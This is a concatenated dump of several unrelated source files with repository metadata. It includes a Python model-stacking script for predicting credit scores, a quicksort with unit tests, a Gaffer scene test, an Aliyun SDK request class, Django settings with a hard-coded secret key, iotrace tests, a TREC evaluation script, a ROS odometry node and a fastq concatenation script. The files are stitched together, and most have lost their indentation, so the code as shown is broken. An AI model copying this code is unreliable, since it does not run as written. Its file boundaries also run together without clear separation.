new_feature_value = []
new_feature_all = []
new_train_value = []
test_data_set = []
test_id = []
skf = KFold(n_splits=nfolds, shuffle=False).split(train_data)
print(train_data[3].shape)
print(train_data[3])
for train, test in skf:
for j, clf in enumerate(clfs):
train_set = list(map(lambda a: list(train_data[a, :]), train))
test_set = list(map(lambda a: list(train_data[a, :]), test))
target_set = list(map(lambda a: target_data[a], train))
train_set = pd.DataFrame(train_set)
print(train_set.shape)
print(len(target_set))
print("model", clf)
clf.fit(train_set, target_set)
new_feature_target = clf.predict(test_set)
new_feature_value.append((j, new_feature_target))
test_id.append((j, test))
test_data_set.append((j, clf.predict(test_data)))
print("新的特征", test_id)
print("新的特征序列", new_feature_value)
print("测试数据集", test_data_set)
return new_feature_value,test_data_set
    def second_model_train(self,new_feature_value,test_data_set):  # returns the meta-feature matrix built from the base-model predictions, plus the blended test-set features
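        # Reassemble the per-fold out-of-fold predictions into one meta-feature
        # matrix (one column per base model) and average each model's test-set
        # predictions across the five folds.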
new_feature_0 = []
new_feature_1 = []
new_feature_2 = []
new_feature_3 = []
new_feature_4 = []
new_feature_matrix = []
for i in new_feature_value:
if i[0] == 0:
new_feature_0 = new_feature_0 + list(i[1])
elif i[0] == 1:
new_feature_1 = new_feature_1 + list(i[1])
elif i[0] == 2:
new_feature_2 = new_feature_2 + list(i[1])
elif i[0] == 3:
new_feature_3 = new_feature_3 + list(i[1])
elif i[0] == 4:
new_feature_4 = new_feature_4 + list(i[1])
print(new_feature_1)
new_feature_matrix.append(new_feature_0)
new_feature_matrix.append(new_feature_1)
new_feature_matrix.append(new_feature_2)
new_feature_matrix.append(new_feature_3)
new_feature_matrix.append(new_feature_4)
new_feature_matrix = pd.DataFrame(new_feature_matrix)
new_feature_matrix = new_feature_matrix.T
print(new_feature_matrix)
new_test_0 = []
new_test_1 = []
new_test_2 = []
new_test_3 = []
new_test_4 = []
new_test_matrix = []
for i in test_data_set:
if i[0] == 0:
new_test_0.append(list(i[1]))
elif i[0] == 1:
new_test_1.append(list(i[1]))
elif i[0] == 2:
new_test_2.append(list(i[1]))
elif i[0] == 3:
new_test_3.append(list(i[1]))
elif i[0] == 4:
new_test_4.append(list(i[1]))
new_test_0 = (pd.DataFrame(new_test_0)).T
new_test_1 = (pd.DataFrame(new_test_1)).T
new_test_2 = (pd.DataFrame(new_test_2)).T
new_test_3 = (pd.DataFrame(new_test_3)).T
new_test_4 = (pd.DataFrame(new_test_4)).T
j = 0
B0 = []
B1 = []
B2 = []
B3 = []
B4 = []
new_test = [new_test_0, new_test_1, new_test_2, new_test_3, new_test_4]
for i in range(len(new_test)):
for j in range(len(new_test[i])):
if i == 0:
B0.append(np.mean(new_test[i].iloc[j, :]))
elif i == 1:
B1.append(np.mean(new_test[i].iloc[j, :]))
elif i == 2:
B2.append(np.mean(new_test[i].iloc[j, :]))
elif i == 3:
B3.append(np.mean(new_test[i].iloc[j, :]))
elif i == 4:
B4.append(np.mean(new_test[i].iloc[j, :]))
new_test_matrix.append(B0)
new_test_matrix.append(B1)
new_test_matrix.append(B2)
new_test_matrix.append(B3)
new_test_matrix.append(B4)
new_test_matrix = pd.DataFrame(new_test_matrix)
new_test_matrix = new_test_matrix.T
print(new_test_matrix)
return new_feature_matrix,new_test_matrix
def second_model_predict(self,new_feature_matrix,new_test_matrix,id):
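        # Level-2 learner: an XGBoost regressor fit on the meta-features, then
        # used to predict scores for the blended test-set features.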
other_params = {'learning_rate': 0.1, 'n_estimators': 200, 'max_depth': 3, 'min_child_weight': 5, 'seed': 0,
'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.1, 'reg_alpha': 0, 'reg_lambda': 1,
'eval_metric': "mae", 'verbose': 1}
clf_2 = XGBRegressor(**other_params)
clf_2.fit(new_feature_matrix, target_data)
test_pre = clf_2.predict(new_test_matrix)
test_pre = [int(a) for a in test_pre]
print(len(test_pre))
dataframe = pd.DataFrame({'id': id, 'score': test_pre})
dataframe.to_csv("result_ensemble_stack.csv", index=False, sep=',')
if __name__ == '__main__':
warnings.filterwarnings('ignore')
    plt.rcParams['font.sans-serif'] = ['SimHei']  # so CJK axis labels display correctly
    plt.rcParams['axes.unicode_minus'] = False  # so minus signs display correctly
data = pd.read_csv('train_dataset.csv', encoding='utf-8')
test = pd.read_csv('test_dataset.csv', encoding='utf-8')
data = data
data = data.fillna(0)
data_hot = data.drop(columns=["用户编码", "信用分", "是否大学生客户", "用户实名制是否通过核实", "当月是否到过福州山姆会员店", "用户最近一次缴费距今时长(月)",
"当月是否逛过福州仓山万达", "是否黑名单客户", "当月物流快递类应用使用次数",
"是否经常逛商场的人", "是否4G不健康客户", "当月火车类应用使用次数", "当月是否看电影", "当月是否体育场馆消费"])
data_hot = pd.DataFrame(data_hot, dtype=float)
train_columns = data_hot.columns.values
test_data = test.drop(columns=["用户编码", "是否大学生客户", "用户实名制是否通过核实", "当月是否到过福州山姆会员店", "用户最近一次缴费距今时长(月)",
"当月是否逛过福州仓山万达", "是否黑名单客户", "当月物流快递类应用使用次数",
"是否经常逛商场的人", "是否4G不健康客户", "当月火车类应用使用次数", "当月是否看电影", "当月是否体育场馆消费"])
test_data = pd.DataFrame(test_data, dtype=float)
target_data = data["信用分"]
train_data = preprocessing.scale(data_hot)
test_data = preprocessing.scale(test_data)
ran_params = {'criterion': 'mae', 'max_depth': 3, 'n_estimators': 200, 'verbose': 1}
logistic_params = {'penalty': 'l2', 'solver': 'lbfgs', 'verbose': 1}
    '''Individual base models used in the ensemble'''
clfs = [LinearRegression(),
ExtraTreesRegressor(**ran_params, bootstrap=True),
RandomForestRegressor(**ran_params),
GradientBoostingRegressor(**ran_params),
LogisticRegression(**logistic_params)]
id = test["用户编码"]
new_feature_value, test_data_set=stacking_model().first_level_model(nfolds=5, train_data=train_data,target_data=target_data,test_data=test_data,clfs=clfs)
new_feature_matrix, new_test_matrix=stacking_model().second_model_train(new_feature_value=new_feature_value,test_data_set=test_data_set)
stacking_model().second_model_predict(new_feature_matrix=new_feature_matrix,new_test_matrix=new_test_matrix,id=id)
|
[
"yanhanwp@foxmail.com"
] |
yanhanwp@foxmail.com
|
c47c906664dbd888a1d723d0837682c338029085
|
f5e2f10e3e9cdd7202d64fd2abb832e9a780ffd5
|
/sorting/quick_sort.py
|
1bbd427f08de015c15fc9f4faab40bdb95233d4b
|
[] |
no_license
|
sarahbkim/cracking_python
|
9b51686c7383375a6c28f52b73d59ae801638965
|
42e059ea19be537cd2af467cdb8e4b777a47aa56
|
refs/heads/master
| 2016-09-05T18:47:43.812688
| 2015-05-08T04:08:46
| 2015-05-08T04:08:46
| 32,619,307
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,711
|
py
|
import unittest
### QUICK SORT
# Divide & Conquer algorithm. Break down the array into sublists until you just get an arr with 1 elem,
# which is always sorted.
## Time: O(n log(n)) average, O(n^2) worst
# worst case scenario avoided with randomized Quick sort
# an efficient sorting algo
# in-place algorithm
## PSEUDOCODE
# partition the list from a pivot (i.e. last element in the list
# then split the list to L and R and partition again
# ## quick sort
def quicksort(arr, start, end):
if start < end:
idx = partition(arr, start, end)
quicksort(arr, start, idx-1)
quicksort(arr, idx+1, end)
return arr
# ## partition
# # select pivot and move elems less than pivot to left, others towards the right
# # returns pivot idx to the quick sort
# # params: arr, start, end
def partition(arr, start, end):
pivot = arr[end] # choose last element to be the pivot
p_idx = start # have p_idx at start of arr
while start < end:
# if item is less than pivot, then swap the items
if arr[start] <= pivot:
arr[start], arr[p_idx] = arr[p_idx], arr[start]
# increment p index
p_idx += 1
start += 1
# swap the pivot item with current p_idx
arr[p_idx], arr[end] = arr[end], arr[p_idx]
return p_idx
class QuickSortTest(unittest.TestCase):
def test(self):
arr = [5, 10, 3, 4, 1]
self.assertEquals(quicksort(arr, 0, len(arr)-1), [1, 3, 4, 5, 10])
def test2(self):
arr = [6, 10, 3, 4, 1, 10, 3, 4, 1]
self.assertEquals(quicksort(arr, 0, len(arr)-1), [1, 1, 3, 3, 4, 4, 6, 10, 10])
if __name__ == '__main__':
unittest.main()
|
[
"pnkdaegee@gmail.com"
] |
pnkdaegee@gmail.com
|
d500ebaec39d2def778178f1c490ffd4688b3d30
|
afa9fcd0f2443515ba89e96ed4eb9416e9d11847
|
/python/GafferSceneTest/MapProjectionTest.py
|
010691447614b653bf9473ed94e0a97b3838810b
|
[
"BSD-3-Clause"
] |
permissive
|
dneg/gaffer
|
6eb12b3ab3cde00afdf170c456969a38f5968237
|
e87cb50f55a048cd7f6d5dcdfe6f95e38db2c5b6
|
refs/heads/master
| 2021-01-16T18:13:33.456876
| 2013-09-24T17:23:58
| 2013-09-24T17:23:58
| 13,094,917
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
##########################################################################
#
# Copyright (c) 2013, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import IECore
import Gaffer
import GafferTest
import GafferScene
import GafferSceneTest
class MapProjectionTest( GafferSceneTest.SceneTestCase ) :
def test( self ) :
cube = GafferScene.Cube()
camera = GafferScene.Camera()
camera["transform"]["translate"]["z"].setValue( 2 )
group = GafferScene.Group()
group["in"].setInput( cube["out"] )
group["in1"].setInput( camera["out"] )
map = GafferScene.MapProjection()
map["in"].setInput( group["out"] )
map["camera"].setValue( "/group/camera" )
oIn = group["out"].object( "/group/cube" )
self.assertTrue( "s" not in oIn )
self.assertTrue( "t" not in oIn )
oOut = map["out"].object( "/group/cube" )
self.assertTrue( "s" in oOut )
self.assertTrue( "t" in oOut )
self.assertTrue( oOut.arePrimitiveVariablesValid() )
oIn["s"] = oOut["s"]
oIn["t"] = oOut["t"]
self.assertEqual( oIn, oOut )
camera["transform"]["translate"]["z"].setValue( 3 )
oOut2 = map["out"].object( "/group/cube" )
self.assertNotEqual( oOut, oOut2 )
def testAffects( self ) :
cube = GafferScene.Cube()
camera = GafferScene.Camera()
group = GafferScene.Group()
group["in"].setInput( cube["out"] )
group["in1"].setInput( camera["out"] )
map = GafferScene.MapProjection()
map["in"].setInput( group["out"] )
cs = GafferTest.CapturingSlot( map.plugDirtiedSignal() )
camera["transform"]["translate"]["z"].setValue( 2 )
self.assertTrue( "out.object" in [ x[0].relativeName( x[0].node() ) for x in cs ] )
del cs[:]
camera["fieldOfView"].setValue( 10 )
self.assertTrue( "out.object" in [ x[0].relativeName( x[0].node() ) for x in cs ] )
del cs[:]
cube["transform"]["translate"]["z"].setValue( 2 )
self.assertTrue( "out.object" in [ x[0].relativeName( x[0].node() ) for x in cs ] )
def testHash( self ) :
cube = GafferScene.Cube()
camera = GafferScene.Camera()
group = GafferScene.Group()
group["in"].setInput( cube["out"] )
group["in1"].setInput( camera["out"] )
map = GafferScene.MapProjection()
map["in"].setInput( group["out"] )
h = map["out"].objectHash( "/group/cube" )
self.assertNotEqual( h, group["out"].objectHash( "/group/cube" ) )
cube["transform"]["translate"]["y"].setValue( 1 )
h2 = map["out"].objectHash( "/group/cube" )
self.assertNotEqual( h, h2 )
if __name__ == "__main__":
unittest.main()
|
[
"john@image-engine.com"
] |
john@image-engine.com
|
a72ef8be86d1904289c47fdf6c7fd22e4c7355ea
|
b7620d0f1a90390224c8ab71774b9c906ab3e8e9
|
/aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20180510/DescribeDomainPvDataRequest.py
|
bd43d6bb5986591e22ae2292f903f6fe900c1dd0
|
[
"Apache-2.0"
] |
permissive
|
YaoYinYing/aliyun-openapi-python-sdk
|
e9c62940baee1a35b9ec4a9fbd1e4eb0aaf93b2f
|
e9a93cc94bd8290d1b1a391a9cb0fad2e6c64627
|
refs/heads/master
| 2022-10-17T16:39:04.515562
| 2022-10-10T15:18:34
| 2022-10-10T15:18:34
| 117,057,304
| 0
| 0
| null | 2018-01-11T06:03:02
| 2018-01-11T06:03:01
| null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcdn.endpoint import endpoint_data
class DescribeDomainPvDataRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2018-05-10', 'DescribeDomainPvData')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StartTime(self): # String
return self.get_query_params().get('StartTime')
def set_StartTime(self, StartTime): # String
self.add_query_param('StartTime', StartTime)
def get_DomainName(self): # String
return self.get_query_params().get('DomainName')
def set_DomainName(self, DomainName): # String
self.add_query_param('DomainName', DomainName)
def get_EndTime(self): # String
return self.get_query_params().get('EndTime')
def set_EndTime(self, EndTime): # String
self.add_query_param('EndTime', EndTime)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
c5b0ca7e31d2cb586122c3ad34788c01d36e6a10
|
8cec8e60bd3823626a6b7e749da4c49cb633eb68
|
/Analyzer/models.py
|
ab71cf62a7ab4f4afb2cffedf1bb3b60eeabdecd
|
[] |
no_license
|
FaizanAkhtar0/Web-App-Senitment-Summarization-Analyzer
|
6cb039849cedaf32c33414a6d67d10261880c4de
|
a1e6d4dc43f2cbc469477831ee89542c75db4e21
|
refs/heads/master
| 2023-06-07T11:26:50.309662
| 2021-07-06T10:25:32
| 2021-07-06T10:25:32
| 383,429,279
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
from django.db import models
# Create your models_lib here.
class SentimentModel(models.Model):
text = models.TextField()
def __str__(self):
return self.text
class SummarizationModel(models.Model):
text = models.TextField()
def __str__(self):
return self.text
|
[
"alex.davidson0987123@gmail.com"
] |
alex.davidson0987123@gmail.com
|
a16594e568cf009eb007c8eb4537713534cfc437
|
cd555116aaa959def0ce4fd286af6a1819f610f6
|
/tests/security/test_sanity.py
|
4e2db286cdb529cba889df1bc1da1ec284b1a0ee
|
[
"MIT",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause-Clear"
] |
permissive
|
mmichal10/standalone-linux-io-tracer
|
741f3ac23ce6ab43b4f37c75dd3ab06e3793f10b
|
5c15b8d3e43845a96fcf8f325c52cb41acb36739
|
refs/heads/master
| 2021-01-07T23:22:25.350400
| 2020-02-19T13:06:09
| 2020-02-19T13:06:09
| 241,849,378
| 0
| 0
|
BSD-3-Clause-Clear
| 2020-02-20T09:56:54
| 2020-02-20T09:56:53
| null |
UTF-8
|
Python
| false
| false
| 2,161
|
py
|
#
# Copyright(c) 2019 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause-Clear
#
import pytest
from core.test_run import TestRun
from iotrace import IotracePlugin
from utils.installer import insert_module
def test_help():
TestRun.LOGGER.info("Testing cli help")
output = TestRun.executor.run('iotrace -H')
if output.exit_code != 0:
raise Exception("Failed to run executable")
def test_version():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing cli version")
output = TestRun.executor.run('iotrace -V')
parsed = TestRun.plugins['iotrace'].parse_json(output.stdout)
bin_version = parsed[0]['trace']
TestRun.LOGGER.info("iotrace binary version is: " + str(parsed[0]['trace']))
TestRun.LOGGER.info("OCTF library version is: " + str(parsed[1]['trace']))
output = TestRun.executor.run("cat /sys/module/iotrace/version")
if output.exit_code != 0:
raise Exception("Could not find module version")
module_version = output.stdout
TestRun.LOGGER.info("Module version is: " + module_version)
if bin_version != module_version:
raise Exception("Mismatching executable and module versions")
def test_module_loaded():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing iotrace kernel module loading")
output = TestRun.executor.run('lsmod | grep iotrace')
if output.exit_code != 0:
raise Exception("Failed to find loaded iotrace kernel module")
def test_trace_start_stop():
TestRun.LOGGER.info("Testing starting and stopping of tracing")
iotrace: IotracePlugin = TestRun.plugins['iotrace']
iotrace.start_tracing()
stopped = iotrace.stop_tracing()
if not stopped:
raise Exception("Could not stop active tracing.")
trace_path = iotrace.get_latest_trace_path()
summary = iotrace.get_trace_summary(trace_path)
summary_parsed = iotrace.parse_json(summary)
if summary_parsed[0]['state'] != "COMPLETE":
raise Exception("Trace state is not complete")
# TODO (trybicki) test for sanity checking installation, e.g. validating install_manifest.
|
[
"mariusz.barczak@intel.com"
] |
mariusz.barczak@intel.com
|
1472ac32737236cd11833e6481a3ca467567341f
|
dce9fd80ad1e35e3fc9fd20d54da03d6a91be11e
|
/main.py
|
58d79589270934c156b296673f48b3573a7611ec
|
[] |
no_license
|
perxpective/Number-Systems-Converter
|
ef4f00f8e22436f9963038ca57cfca81399c6567
|
00d72be3468a2621ba8861e9c0da5529842914c2
|
refs/heads/master
| 2022-11-14T01:05:09.475320
| 2020-07-12T09:05:11
| 2020-07-12T09:05:11
| 264,118,577
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,081
|
py
|
import binascii
output = ''
print('[1] convert to binary')
print('[2] convert to hexadecimals')
print('[3] convert to octal')
print('[4] decode hexadecimal to text')
option = input('select option: ')
while not (option == '1' or option == '2' or option == '3' or option == '4'):
print('invalid input')
option = input('select option: ')
# text to ascii to binary
if option == '1':
string = input('enter string to cipher: ')
for char in string:
char_num = bin(ord(char))
output += char_num[2:]
# text to ascii to hexadecimals
elif option == '2':
string = input('enter string to cipher: ')
for char in string:
char_num = hex(ord(char))
output += char_num[2:]
# text to ascii to octal
elif option == '3':
string = input('enter string to cipher: ')
for char in range(len(string)):
char_num = oct(ord(string[char]))
output += char_num[2:]
# deciphering
elif option == '4':
string = input('enter string to decipher: ')
output = binascii.unhexlify(string).decode()
print('value: ', output)
|
[
"noreply@github.com"
] |
perxpective.noreply@github.com
|
6c3bba898e8333956b874fecb0fdc452a4f7fd87
|
c7d86fee5322ca7f2c57fff79798c82385d86769
|
/jisc_django_test/settings.py
|
375aea2b7fa17d555874cf3e286ff929475d4fc8
|
[] |
no_license
|
scheung38/jisc_django_test
|
493d146b80defc9c3eea88e607cb783da3433940
|
408793ae1495ce4e6a4b57c91d32605039f68419
|
refs/heads/master
| 2021-04-12T11:01:41.770406
| 2017-06-16T17:35:10
| 2017-06-16T17:35:10
| 94,537,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,499
|
py
|
"""
Django settings for jisc_django_test project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o)wl=4potk%kqb2m^m&pl6nk8mi13)r%24b+&mctamdkkdbo*)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [u'localhost', u'6564f81c.ngrok.io']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
'hitcount',
]
EMAIL_HOST = os.environ['EMAIL_HOST']
EMAIL_PORT = os.environ['EMAIL_PORT']
EMAIL_HOST_USER = os.environ['EMAIL_HOST_USER']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']
EMAIL_USE_TLS = True
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jisc_django_test.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'jisc_django_test.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"sebastian_cheung@yahoo.com"
] |
sebastian_cheung@yahoo.com
|
21fb22dd59287a6c7319cdac2b7cc612d60154c8
|
c6f493d0955803d58dc41f0a4b12847f1ce83712
|
/py_journal_fielded_retrieval/trecEvalTuneBoost_Navigational.py
|
24fd301d6bbcf3eaa4e901d66471f4ef0d3b7c02
|
[] |
no_license
|
ielab/field-based-retrieval
|
7b94c0feb5cd0de25087cb7bb94c055b286257db
|
dd54785473af6fc70fd2242c4fc64323bcb1e8c2
|
refs/heads/master
| 2020-11-28T02:24:09.515215
| 2019-12-23T05:00:53
| 2019-12-23T05:00:53
| 229,679,505
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,674
|
py
|
# This script do trec eval with minimum threshold of 4 to measure Reciprocal Rank for WEB 2013-2014
import commands, os
import glob
import multiprocessing
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-d",
"--dataset",
help="WEB2013-2014",
choices=["WEB2013-2014"])
args = parser.parse_args()
dataSet = args.dataset
if dataSet == "WEB2013-2014":
qrelPath = "/volumes/ext/data/webTrack2013-2014_eval/qrels.adhoc2013-2014.txt"
topPrefix = "topTuneBoost_Web_alpha"
resultFile = "evalTuneBoost_Web_Navigational.txt"
trecPath = "/volumes/ext/tools/trec_eval.9.0/"
dataPath = '/volumes/ext/jimmy/experiments/ipm_fielded_retrieval/data/'
def eval(fname):
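    # Run trec_eval per query with a minimum relevance level of 4 (-l 4) and
    # parse the per-query map / P@10 / nDCG / bpref / reciprocal-rank values.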
trecResults = commands.getoutput(trecPath +
'trec_eval -q -l 4 -m map -m P.10 -m ndcg_cut.10,1000 -m bpref -m relstring.10 '
'-m recip_rank ' + qrelPath + " " + fname)
#print trecResults
filename = os.path.basename(fname)
alpha = filename.replace(topPrefix,"")
map = p10 = ndcg10 = ndcg1000 = bpref = numUnjudged = rr = "*"
relString = qNum = "*"
resultString = ""
for res in trecResults.splitlines():
measure = res.split()[0]
qNum = res.split()[1]
score = res.split()[2]
if qNum != "all":
if measure == "map":
map = score
elif measure == "bpref":
bpref = score
elif measure == "P_10":
p10 = score
elif measure == "relstring_10":
relString = score
numUnjudged = relString.count('-')
elif measure == "recip_rank":
rr = score
elif measure == "ndcg_cut_10":
ndcg10 = score
elif measure == "ndcg_cut_1000":
ndcg1000 = score
resultString += filename + " " + alpha + " " + qNum + " " + map + " " + p10 + " " + ndcg10 + " " + \
ndcg1000 + " " + bpref + " " + str(numUnjudged) + " " + relString + " " + rr + "\n"
print ("File name: {0} Completed".format(filename))
return resultString
fileNames = glob.glob(dataPath + topPrefix + "*")
fw = open(dataPath + resultFile, 'w')
fw.write("schema" + " " + "alpha" + " " + " QueryNum"+ " " + "map" + " " + "p10" + " " + "ndcg10" + " " + "ndcg1000" +
" " + "bpref" + " " + "unjudged" + " " + "relString" + " " + "rr""\n")
p = multiprocessing.Pool()
resultString = p.map(eval, fileNames)
for res in resultString:
fw.write(res)
p.close()
p.join()
fw.close()
|
[
"g.zuccon@uq.edu.au"
] |
g.zuccon@uq.edu.au
|
d26bcb089045d4c612eaf552518266598fa78686
|
a929c07c2252028fc054bd8de957286a76b89e03
|
/src/android/src/vo_restarter.py
|
b3290f37c7c857fca0ffb1718442dea36d61c6c5
|
[
"BSD-3-Clause"
] |
permissive
|
Mars-Rover-Manipal/catkin_ws
|
77e313c20162833331e23c82c93a15a002a204ff
|
9858d19ee1457e94952717798c5b927e0b0570cf
|
refs/heads/master
| 2022-04-16T06:56:02.781109
| 2020-03-05T09:08:32
| 2020-03-05T09:08:32
| 263,706,258
| 1
| 0
|
BSD-3-Clause
| 2020-05-13T18:02:58
| 2020-05-13T18:02:57
| null |
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
#!/usr/bin/env python
import rospy
from sensor_msgs.msg import Imu
from nav_msgs.msg import Odometry
from rtabmap_ros.srv import *
import tf
rospy.init_node('vo_restarter', anonymous=True)  # ROS node names may not contain '.'
last_odom = Odometry()
last_imu = Imu()
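# When visual odometry reports a covariance of 9999 it has lost tracking, so
# the odometry is reset to the last good pose and IMU orientation.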
def reset_odom_to(p, o):
rospy.logdebug('Restarting Odometry')
rospy.wait_for_service('reset_odom_to_pose')
try:
reset = rospy.ServiceProxy('reset_odom_to_pose', ResetPose)
eu = tf.transformations.euler_from_quaternion((p.orientation.x, p.orientation.y, p.orientation.z, p.orientation.w))
        reset(o.pose.pose.position.x, o.pose.pose.position.y, o.pose.pose.position.z, eu[0], eu[1], eu[2])  # Odometry nests the position under pose.pose.position
rospy.logdebug('Service reset successfull')
except rospy.ServiceException, e:
rospy.logfatal('Service call to restore vo failed')
def store_last_odom(data):
global last_imu, last_odom
if data.pose.covariance[0] == 9999.0:
reset_odom_to(last_imu, last_odom)
else:
last_odom = data
def store_last_orientation(data):
global last_imu
last_imu = data
def main():
rospy.Subscriber('/visual_odom', Odometry, store_last_odom)
rospy.Subscriber('/phone/imu/data', Imu, store_last_orientation)
rospy.spin()
if __name__ == '__main__':
main()
|
[
"abhirajtiwari@gmail.com"
] |
abhirajtiwari@gmail.com
|
5ffbe59f9c81e547faa22ba27b316ef2516f1251
|
439671db0b34da214f225f78ca331cabd24cad79
|
/SubmissionScripts/catCRISPRKOFastq_2.py
|
9b705756f29ffef335338b1e83bf5a2c99c4bd8a
|
[] |
no_license
|
arjunrajlaboratory/TEanalysis
|
18c42726b75c5f8a273e606b5383eaf40485e46e
|
1ba383bb481841baa009fcb15ed39c26c1f062f3
|
refs/heads/master
| 2022-09-01T07:13:30.845976
| 2020-05-26T20:52:53
| 2020-05-26T20:52:53
| 267,149,695
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,886
|
py
|
#Concatanate fastq files for each sample across multiple lanes.
#Written for et_CRISPR-RNAseq KO data on PMACS
import os, shutil
from argparse import ArgumentParser
import glob
import regex as re
#Command line parser
parser = ArgumentParser()
parser.add_argument("-i", "--inDirs", help = "Specify the input directories.", nargs = '+')
parser.add_argument("-o", "--outDir", help = "Specify the output directory")
args = parser.parse_args()
inputDirectories = args.inDirs
if not os.path.exists(args.outDir):
os.makedirs(args.outDir)
sampleNameRegex = re.compile('.+?(?=_S)')
